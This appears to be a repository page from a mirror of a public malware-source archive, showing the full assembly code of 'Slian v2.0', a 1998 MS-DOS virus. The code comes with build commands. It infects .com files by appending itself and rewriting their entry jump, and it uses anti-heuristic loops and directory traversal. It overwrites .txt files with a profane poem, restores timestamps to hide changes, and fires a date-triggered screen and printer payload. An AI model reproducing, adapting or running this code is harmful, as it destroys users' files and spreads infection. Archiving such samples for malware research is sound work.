ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
26192f771b
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.slian.asm
vxunderground 5dd4938a52
Add files via upload
2021-01-12 17:58:25 -06:00

278 lines
12 KiB
NASM
Raw Blame History

; ------------------------------------------------------------------------- ;
; Slian v2.0 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: ;
; ;
; v1.0 - start with *.com appender - great tutorials Horny Toad! CB #1,2,3 ;
; v1.1 - add a anti-heuristic loop - Ars0nic's article in Codebreakers #3 ;
; v1.2 - add no bigger, no smaller - Opic's Virus-Addons article in CB #3 ;
; v1.3 - add directory transversal - thankz to SPo0ky / Opic for this :) ;
; v1.4 - add date activated p-load - Opic's Virus-Addons article in CB #3 ;
; v1.5 - add *.txt file overwriter - great tutorials Horny Toad! CB #1,2,3 ;
; v1.6 - optimize my code a little - thanks Opic :) ;
; v1.7 - add anti-heuristic tricks - Ars0nic's article in Codebreakers #3 ;
; v1.8 - add appending of any file - Sea4's Nautilus Virus ;
; v1.9 - add overwrite of any file - thanks again Sea4 hehe ;
; v2.0 - add date/time restoration - thankz again Opic man :) ;
; ------------------------------------------------------------------------- ;
; -----------> Dedicated to Christine Moore, I'll be back soon! <---------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm slian.asm ;
; to link :::::] tlink /t slian.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment "code"
assume cs:code,ds:code ; assign cs and ds to code
org 100h ; a .com file
start:
db 0e9h,0,0 ; define a blank jump
real_start:
mov cx,0ffffh ; from other anti-heuristics
anti_one:
jmp anti_two ; jump to anti two
mov ax,4c00h ; terminate program
call do_it ; make it so DOS!
anti_two:
loop anti_one ; loop anti_one
;call_delta:
call get_delta ; push IP on to stack
get_delta:
pop bp ; pop it into bp
sub bp,offset get_delta ; get the delta offset
;first_three:
mov cx,3 ; counter set to three
lea si,[bp+offset thrbyte] ; where to write them
mov di,100h ; start address
push di ; save it for retn
rep movsb ; do until cx = 0
;move_dta:
lea dx,[bp+offset dta] ; where to move it
mov ah,1ah ; move the dta
call do_it ; make it so DOS!
get_one:
mov ah,4eh ; find first file
lea dx,[bp+comfile] ; load *.com
mov cx,7 ; all attributes
next:
call do_it ; make it so DOS!
jnc open_file ; found one? open it
jmp find_txt ; no .com left? .txt now
next_dir:
lea dx,[bp+dot_dot] ; load effective address ..
mov ah,3bh ; directory changing
call do_it ; make it so DOS!
jnc get_one ; and find first again
jmp pld_chk ; hit root, payload time?
open_file:
lea dx,[bp+dta+1eh] ; filename in DTA
mov ax,4301h ; set file attributes
xor cx,cx ; to absolutely none
call do_it ; make it so DOS!
mov ax,3d02h ; open the file read/write
lea dx,[bp+offset dta+1eh] ; get the file name info
call do_it ; make it so DOS!
xchg ax,bx ; move the file info
mov ax,5700h ; get time/date stamps
call do_it ; make it so DOS!
mov [bp+time_cm],dx ; save the values here
mov [bp+date_cm],cx ; save the values here
;record_three:
mov ah,3fh ; the read / record function
lea dx,[bp+thrbyte] ; where to record too
mov cx,3 ; how much to record
call do_it ; make it so DOS!
;file_check:
mov ax,word ptr [bp+dta+1ah] ; get file size
mov cx,word ptr [bp+thrbyte+1] ; get three bytes
add cx,finished-real_start+3 ; get virus and jump size
cmp ax,cx ; compare the two
jz close_file ; if equal, close file
;too_big:
cmp word ptr [bp+dta+1ah],61440 ; > then 61440d bytes?
jna too_small ; not too big, too small?
jmp close_file ; too big, close it up
too_small:
cmp word ptr [bp+dta+1ah],1024 ; < then 1024d bytes?
jnb new_jump ; not too small, continue
jmp close_file ; too small, close it up
new_jump:
sub ax,3 ; file size - 3 bytes
mov word ptr [bp+newjump+1],ax ; write as new jump
;point_to_begin:
mov ax,4200h ; point to start of file
xor cx,cx ; cx to 0
xor dx,dx ; dx to 0
call do_it ; make it so DOS!
;write_jump:
mov ah,40h ; write to file
mov cx,3 ; three bytes
lea dx,[bp+newjump] ; write this
call do_it ; make it so DOS!
;point_to_end:
mov ax,4202h ; point to end of file
xor cx,cx ; cx to 0
xor dx,dx ; dx to 0
call do_it ; make it so DOS!
;write_body:
mov ah,40h ; write to file
lea dx,[bp+real_start] ; what to write
mov cx,finished-real_start ; how much to write
call do_it ; make it so DOS!
close_file:
mov ax,5701h ; restore time/date stamps
mov dx,[bp+time_cm] ; from this value
mov cx,[bp+date_cm] ; and this value
call do_it ; make it so DOS!
mov ah,3eh ; close up the file
call do_it ; make it so DOS!
;next_file:
mov ah,4fh ; find next file
jmp next ; and jump to next
find_txt:
mov dx,80h ; move DTA to here
mov ah,1ah ; move the DTA
call do_it ; make it so DOS!
mov ah,4eh ; find first file
xor cx,cx ; cx to 0
lea dx,txtfile ; load *.txt address
next_txt:
call do_it ; make it so DOS!
jnc open_txt ; found a .txt? open it
jmp next_dir ; none found? next directory
open_txt:
mov dx,9eh ; filename in DTA
mov ax,4301h ; set file attributes
xor cx,cx ; to absolutely none
call do_it ; make it so DOS!
mov ax,3d02h ; all file attributes
mov dx,9eh ; get the file name info
call do_it ; make it so DOS!
xchg bx,ax ; move the file info
mov ax,5700h ; get time/date stamps
call do_it ; make it so DOS!
mov [bp+time_tx],dx ; save the values here
mov [bp+date_tx],cx ; save the values here
;infect_txt:
mov ah,40h ; write to file
lea dx,txt_start ; where to start
mov cx,txt_end-txt_start ; how much to write
call do_it ; make it so DOS!
;close_txt:
mov ax,5701h ; restore time/date stamps
mov dx,[bp+time_tx] ; from this value
mov cx,[bp+date_tx] ; and this value
call do_it ; make it so DOS!
mov ah,3eh ; close the file
call do_it ; make it so DOS!
;find_next:
mov ah,4fh ; find next .txt file
jmp next_txt ; and go again
end_virus:
retn ; return control to host
pld_chk:
mov ah,2ah ; get system date
call do_it ; make it so DOS!
cmp dh,07 ; is it July?
je day_chk ; yes it is, check day now
jmp end_virus ; nope, end virus
day_chk:
cmp dl,16 ; is it the 16th?
je payload ; woohoo payload time!
jmp end_virus ; nope, end virus
payload:
mov ah,09h ; print a message to screen
lea dx,[bp+pld_msg] ; the message
call do_it ; make it so DOS!
mov ah,01h ; start printer <grin>
mov dx,0h ; put 0h into dx
int 17h ; printer int
lea si,string1 ; where to start
mov cx,endstring1-string1 ; how much to write
print_message:
mov ah,00h ; write characters
lodsb ; load a byte
int 17h ; printer int
loop print_message ; loop until done
jmp end_virus ; and end the virus
do_it:
int 21h ; make it so DOS!
ret ; return from call
;data_area:
txt_start:
db '',10
db 'Need you, Dream you',10
db 'Find you, Taste you',10
db 'Fuck you, Use you',10
db 'Scar you, Break you',10
db 'Lose me, Hate me',10
db 'Smash me, Erase me',10
db '',10
txt_end:
string1:
pld_msg db '',10,13
db 'Happy Birthday Christine!',10,13
db 'Your As Beautiful As Ever',10,13,'$'
endstring1:
time_cm dw 0h ; .com time stamp goes here
time_tx dw 0h ; .txt time stamp goes here
date_cm dw 0h ; .com date stamp goes here
date_tx dw 0h ; .txt date stamp goes here
dot_dot db "..",0 ; define the .. string
comfile db "*.c*",0 ; define the *.com string
txtfile db "*.tx*",0 ; define the *.txt string
thrbyte db 0cdh,20h,0 ; terminates on first run
newjump db 0e9h,0,0 ; blank jump on first run
finished label near ; an offset label
dta db 42 dup (?) ; set up space for DTA
code ends ; end code segment
end start ; end / where to start
; ------------------------------------------------------------------------- ;
; ----------> How Can You Think Freely In The Shadow Of A Church <--------- ;
; ------------------------------------------------------------------------- ;
Reference in New Issue View Git Blame Copy Permalink